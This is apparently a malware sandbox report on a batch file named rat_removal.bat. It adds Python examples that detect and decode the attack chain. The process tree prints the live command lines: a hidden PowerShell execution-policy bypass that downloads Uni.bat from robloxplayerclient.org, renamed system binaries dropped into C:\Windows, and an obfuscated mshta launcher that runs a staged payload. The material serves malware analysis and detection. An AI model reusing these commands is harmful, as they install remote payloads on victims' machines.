Analysis

max time kernel: 43s
max time network: 23s
platform: windows11-21h2_x64
resource: win11-20240214-en
resource tags: arch:x64, arch:x86, image:win11-20240214-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 14/03/2024, 05:24
Static task: static1
Behavioral task: behavioral1 (sample rat_removal.bat, resource win10-20240221-en)
Behavioral task: behavioral2 (sample rat_removal.bat, resource win10v2004-20240226-en)
Behavioral task: behavioral3 (sample rat_removal.bat, resource win11-20240214-en)
General

Target: rat_removal.bat
Size: 14KB
MD5: 2c0ee080298d0de1320e6e7eda4ca39b
SHA1: edd03f96d4f4277a24e541376fdddf43439b4a99
SHA256: 7e81cadeef133c8230dbe26f95a66d3b47cead73ba1e37170ac95869abe17f8e
SHA512: ffdfd43eb46107be849d3e1938d1db0be87d27700799a9f31527b512abaca615241c6ee2d6358061d5ea133233aa0edda9908091419c024977b25365064d9e64
SSDEEP: 192:HbKSAmk7b/FQASmmZrQCgljChA4DW0JyquFnpUoH:H28k7b/hkQCgljwAEbyvFpL
Malware Config

Signatures

Blocklisted process makes network request (1 IoC)
  flow  pid   Process
  2     1996  powershell.exe

Executes dropped EXE (1 IoC)
  pid   Process
  2008  $sxr-mshta.exe

Drops file in Windows directory (6 IoCs)
  description                   ioc                              Process
  File created                  C:\Windows\$sxr-powershell.exe   powershell.exe
  File opened for modification  C:\Windows\$sxr-powershell.exe   powershell.exe
  File created                  C:\Windows\$sxr-mshta.exe        powershell.exe
  File opened for modification  C:\Windows\$sxr-mshta.exe        powershell.exe
  File created                  C:\Windows\$sxr-cmd.exe          powershell.exe
  File opened for modification  C:\Windows\$sxr-cmd.exe          powershell.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (8 IoCs)
  pid   Process
  1996  powershell.exe
  1996  powershell.exe
  2444  powershell.exe
  2444  powershell.exe
  2444  powershell.exe
  2444  powershell.exe
  2444  powershell.exe
  2444  powershell.exe

Suspicious use of AdjustPrivilegeToken (4 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  1996  powershell.exe
  Token: SeDebugPrivilege  2444  powershell.exe
  Token: SeDebugPrivilege  2444  powershell.exe
  Token: SeDebugPrivilege  2444  powershell.exe

Suspicious use of WriteProcessMemory (26 IoCs; each row below is recorded twice in the report)
  description                       pid   Process  procid_target
  PID 3252 wrote to memory of 4420  3252  cmd.exe  80
  PID 3252 wrote to memory of 4160  3252  cmd.exe  81
  PID 3252 wrote to memory of 4472  3252  cmd.exe  82
  PID 3252 wrote to memory of 4124  3252  cmd.exe  83
  PID 3252 wrote to memory of 3556  3252  cmd.exe  84
  PID 3252 wrote to memory of 4652  3252  cmd.exe  85
  PID 3252 wrote to memory of 3260  3252  cmd.exe  86
  PID 3252 wrote to memory of 2996  3252  cmd.exe  87
  PID 3252 wrote to memory of 2608  3252  cmd.exe  88
  PID 3252 wrote to memory of 1996  3252  cmd.exe  89
  PID 3252 wrote to memory of 3028  3252  cmd.exe  92
  PID 3028 wrote to memory of 5016  3028  cmd.exe  93
  PID 3028 wrote to memory of 2444  3028  cmd.exe  94

Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
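The signatures above are the sandbox's own heuristics. As an added example that is not part of this report, the Python below runs equivalent process-creation checks over records constructed from the process tree on this page: renamed copies of system binaries (the $sxr-* files dropped into C:\Windows and then executed), mshta launched with a javascript: handler, PowerShell with execution-policy bypass and a hidden window, a download cradle, a script body staged in an environment variable, and cmd's %VAR:old=new% substitution. The rule names, the EVENTS list (pids and command lines copied from the tree, the mshta command line shortened, unknown parents recorded as 0) and the LEGIT_DIRS set are assumptions made for the example. Real telemetry such as Sysmon event ID 1 also carries OriginalFileName from the PE version resource, which identifies a renamed binary more reliably than the file-name suffix match used here.

```python
import ntpath
import re

# Process-creation records CONSTRUCTED from the process tree in this report.
# pids, parents and command lines are copied from it; the $sxr-mshta.exe
# command line is shortened to its opening fragment; unknown parent = 0.
EVENTS = [
    {"pid": 3252, "ppid": 0, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rat_removal.bat"'},
    {"pid": 4420, "ppid": 3252, "image": r"C:\Windows\system32\chcp.com", "cmdline": "chcp.com 437"},
    {"pid": 4472, "ppid": 3252, "image": r"C:\Windows\system32\findstr.exe",
     "cmdline": r"findstr /L /I set C:\Users\Admin\AppData\Local\Temp\rat_removal.bat"},
    {"pid": 1996, "ppid": 3252, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "
                "\"Invoke-WebRequest -Uri 'https://robloxplayerclient.org/Uni.bat' "
                "-OutFile: 'C:\\Users\\Admin\\AppData\\Local\\Temp\\Uni.bat'\""},
    {"pid": 3028, "ppid": 3252, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Uni.bat"'},
    {"pid": 5016, "ppid": 3028, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:OWMmhUSKSJ; "'},
    {"pid": 2444, "ppid": 3028, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden"},
    {"pid": 2008, "ppid": 0, "image": r"C:\Windows\$sxr-mshta.exe",
     "cmdline": r'''C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>');close();"'''},
    {"pid": 432, "ppid": 2008, "image": r"C:\Windows\$sxr-cmd.exe",
     "cmdline": r'"C:\Windows\$sxr-cmd.exe" /c %$sxr-jKiXOIbCnNURqPPCCxgw4312:MtFhlUnv=%'},
]

# System binaries that are commonly copied under a new name to dodge image-name rules.
SYSTEM_BINARIES = ("powershell.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe", "rundll32.exe")
# Directories these binaries legitimately run from (assumption for the example).
LEGIT_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64",
              r"c:\windows\system32\windowspowershell\v1.0"}


def underlying_binary(image):
    """Map an image name, possibly renamed like $sxr-mshta.exe, to the system binary it ends with."""
    name = ntpath.basename(image).lower()
    for orig in SYSTEM_BINARIES:
        if name.endswith(orig):
            return orig
    return None


def renamed_lolbin(image):
    """Flag a system binary that was renamed or that runs from an unexpected directory."""
    directory, name = ntpath.split(image)
    orig = underlying_binary(image)
    if orig is None:
        return None
    if name.lower() != orig:
        return f"renamed copy of {orig}: {image}"
    if directory.lower() not in LEGIT_DIRS:
        return f"{orig} running from unexpected directory: {directory}"
    return None


# (reason, pattern, underlying binaries the rule applies to; None means any image)
CMDLINE_RULES = [
    ("mshta launched with a script: protocol handler",
     re.compile(r"(?:java|vb)script:", re.I), {"mshta.exe"}),
    ("powershell with execution-policy bypass and hidden window",
     re.compile(r"-(?:ep|executionpolicy)\s+bypass.*-w(?:indowstyle)?\s+hidden", re.I | re.S), {"powershell.exe"}),
    ("download cradle",
     re.compile(r"Invoke-WebRequest|DownloadString|DownloadFile|Start-BitsTransfer", re.I), {"powershell.exe"}),
    ("script body staged in an environment variable",
     re.compile(r"(?:Invoke-Expression|iex)\s*\(?\s*\$env:", re.I), None),
    ("cmd %VAR:old=new% substitution used to rebuild a command at run time",
     re.compile(r"%[^%:=]+:[^=%]+=[^%]*%"), {"cmd.exe"}),
]


def scan(events):
    """Return {pid: [reasons]} for every record that trips at least one check."""
    findings = {}
    for ev in events:
        reasons = []
        rename = renamed_lolbin(ev["image"])
        if rename:
            reasons.append(rename)
        orig = underlying_binary(ev["image"])
        for reason, pattern, scope in CMDLINE_RULES:
            if scope is not None and orig not in scope:
                continue
            if pattern.search(ev["cmdline"]):
                reasons.append(reason)
        if reasons:
            findings[ev["pid"]] = reasons
    return findings


if __name__ == "__main__":
    for pid, reasons in scan(EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```

Run as written, the benign helpers in the tree (chcp.com, findstr.exe, the cmd.exe instances that only run the batch files) produce no findings, while the two PowerShell instances, the echo/Invoke-Expression cmd, and both $sxr-* copies are flagged.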
Processes

Indentation shows parent/child nesting. Each entry gives the image path and PID, then the command line, then any signatures the sandbox attached to that process.

C:\Windows\system32\cmd.exe  (PID 3252)
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rat_removal.bat"
    Signatures: Suspicious use of WriteProcessMemory

    C:\Windows\system32\chcp.com  (PID 4420)
        chcp.com 437

    C:\Windows\system32\cmd.exe  (PID 4160)
        C:\Windows\system32\cmd.exe /c type tmp

    C:\Windows\system32\findstr.exe  (PID 4472)
        findstr /L /I set C:\Users\Admin\AppData\Local\Temp\rat_removal.bat

    C:\Windows\system32\findstr.exe  (PID 4124)
        findstr /L /I goto C:\Users\Admin\AppData\Local\Temp\rat_removal.bat

    C:\Windows\system32\findstr.exe  (PID 3556)
        findstr /L /I echo C:\Users\Admin\AppData\Local\Temp\rat_removal.bat

    C:\Windows\system32\findstr.exe  (PID 4652)
        findstr /L /I pause C:\Users\Admin\AppData\Local\Temp\rat_removal.bat

    C:\Windows\system32\find.exe  (PID 3260)
        find

    C:\Windows\system32\find.exe  (PID 2996)
        find

    C:\Windows\system32\cmd.exe  (PID 2608)
        C:\Windows\system32\cmd.exe /c type tmp

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1996)
        powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://robloxplayerclient.org/Uni.bat' -OutFile: 'C:\Users\Admin\AppData\Local\Temp\Uni.bat'"
        Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\cmd.exe  (PID 3028)
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
        Signatures: Suspicious use of WriteProcessMemory

        C:\Windows\system32\cmd.exe  (PID 5016)
            C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:OWMmhUSKSJ; "

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2444)
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
            Signatures: Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

C:\Windows\$sxr-mshta.exe  (PID 2008)
    C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-jKiXOIbCnNURqPPCCxgw4312:MtFhlUnv=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
    Signatures: Executes dropped EXE

    C:\Windows\$sxr-cmd.exe  (PID 432)
        "C:\Windows\$sxr-cmd.exe" /c %$sxr-jKiXOIbCnNURqPPCCxgw4312:MtFhlUnv=%
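The $sxr-mshta.exe command line above builds its HTML from dozens of short string fragments joined with + and hidden behind \x20 and \x22 escapes, and the command it finally hands to WScript.Shell relies on cmd's %VAR:old=new% substring substitution to strip a junk token (MtFhlUnv) out of an environment variable that holds the real command. The Python below, an added example and not part of this report, reassembles the fragments and applies the substitution so the final command can be read. MSHTA_CMDLINE is copied from the process tree; CONSTRUCTED_ENV is a made-up placeholder because the sandbox did not record the variable's value, and the function and constant names are the example's own.

```python
import re

# Command line of the dropped $sxr-mshta.exe copy, copied from the process tree in this report.
MSHTA_CMDLINE = r"""C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-jKiXOIbCnNURqPPCCxgw4312:MtFhlUnv=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();" """.strip()

# A single-quoted JavaScript string literal, escapes included.
JS_STRING_LITERAL = re.compile(r"'((?:[^'\\]|\\.)*)'")
SIMPLE_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "0": "\0", "b": "\b", "f": "\f", "v": "\v"}


def js_unescape(body):
    """Decode the escape sequences JavaScript allows inside a string literal."""
    out, i = [], 0
    while i < len(body):
        ch = body[i]
        if ch != "\\":
            out.append(ch)
            i += 1
            continue
        nxt = body[i + 1]
        if nxt == "x":                      # \x20 -> ' '
            out.append(chr(int(body[i + 2:i + 4], 16)))
            i += 4
        elif nxt == "u":                    # \u0041 -> 'A'
            out.append(chr(int(body[i + 2:i + 6], 16)))
            i += 6
        else:                               # \\ \' \" and the single-letter escapes
            out.append(SIMPLE_ESCAPES.get(nxt, nxt))
            i += 2
    return "".join(out)


def join_concatenation(expr):
    """Evaluate an expression made only of single-quoted literals joined with '+'."""
    return "".join(js_unescape(lit) for lit in JS_STRING_LITERAL.findall(expr))


def decode_mshta_javascript(cmdline):
    """Recover the HTML written by document[...](...) and the command it runs via WScript.Shell."""
    m = re.search(r"javascript:document\[(?P<method>.*?)\]\((?P<arg>.*)\)\s*;\s*close\(\)", cmdline, re.S)
    if not m:
        raise ValueError("no document[...](...) call found")
    html = join_concatenation(m.group("arg"))
    run = re.search(r'\.Run\s+"([^"]*)"', html)
    return {"method": join_concatenation(m.group("method")),
            "html": html,
            "run_command": run.group(1) if run else None}


# cmd.exe's %VAR:old=new% form: every occurrence of old in VAR's value is replaced by new.
CMD_SUBSTITUTION = re.compile(r"%(?P<name>[^%:=]+):(?P<old>[^=%]+)=(?P<new>[^%]*)%")


def expand_cmd_substitutions(cmdline, env):
    """Apply %VAR:old=new% references using the given environment (names and matching are case-insensitive, as in cmd)."""
    lowered = {k.lower(): v for k, v in env.items()}

    def repl(m):
        value = lowered.get(m.group("name").lower())
        if value is None:
            return m.group(0)               # value unknown: leave the reference as written
        return re.sub(re.escape(m.group("old")), lambda _: m.group("new"), value, flags=re.I)

    return CMD_SUBSTITUTION.sub(repl, cmdline)


# CONSTRUCTED placeholder: the sandbox did not record the real value of this variable.
# The junk token MtFhlUnv is what the %VAR:MtFhlUnv=% reference strips out at run time.
CONSTRUCTED_ENV = {"$sxr-jKiXOIbCnNURqPPCCxgw4312": "ecMtFhlUnvho placeholMtFhlUnvder-payload"}

if __name__ == "__main__":
    info = decode_mshta_javascript(MSHTA_CMDLINE)
    print("document method :", info["method"])
    print("written HTML    :", info["html"])
    print("WScript.Shell.Run:", info["run_command"])
    print("after %VAR:old=new%:", expand_cmd_substitutions(info["run_command"], CONSTRUCTED_ENV))
```

The reassembled HTML is a VBScript block that calls WScript.Shell.Run on C:\Windows\$sxr-cmd.exe with a hidden window (the 0 argument) and waits for it to finish (True), which matches the child $sxr-cmd.exe entry in the tree; the real payload lives in the environment variable and is only visible by reading it from the scheduled task or registry that sets it.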
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 2KB
MD5: 5f4c933102a824f41e258078e34165a7
SHA1: d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256: d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512: a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Filesize: 15.5MB
MD5: 7b10ed9636b737ceadbb064086ff94ca
SHA1: de075e9898da93e3ebb17b86240716ef44df3574
SHA256: 19086f3bc2b071cf02d549551dae87f5baa0eee53305881d77b25a9be9e4e1ad
SHA512: 2bcd2d8f188498b577aedcb8e017e3a24ce61e1933090d20fbbfacca90bf5b3e4a2a9b213a479bd19a0aedf622f6ffa08f042b40bc73f66c8c1534966d5b9eeb

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 14B
MD5: ce585c6ba32ac17652d2345118536f9c
SHA1: be0e41b3690c42e4c0cdb53d53fc544fb46b758d
SHA256: 589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3
SHA512: d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

Filesize: 324KB
MD5: c5db7b712f280c3ae4f731ad7d5ea171
SHA1: e8717ff0d40e01fd3b06de2aa5a401bed1c907cc
SHA256: f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba
SHA512: bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89

Filesize: 32KB
MD5: 356e04e106f6987a19938df67dea0b76
SHA1: f2fd7cde5f97427e497dfb07b7f682149dc896fb
SHA256: 4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e
SHA512: df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd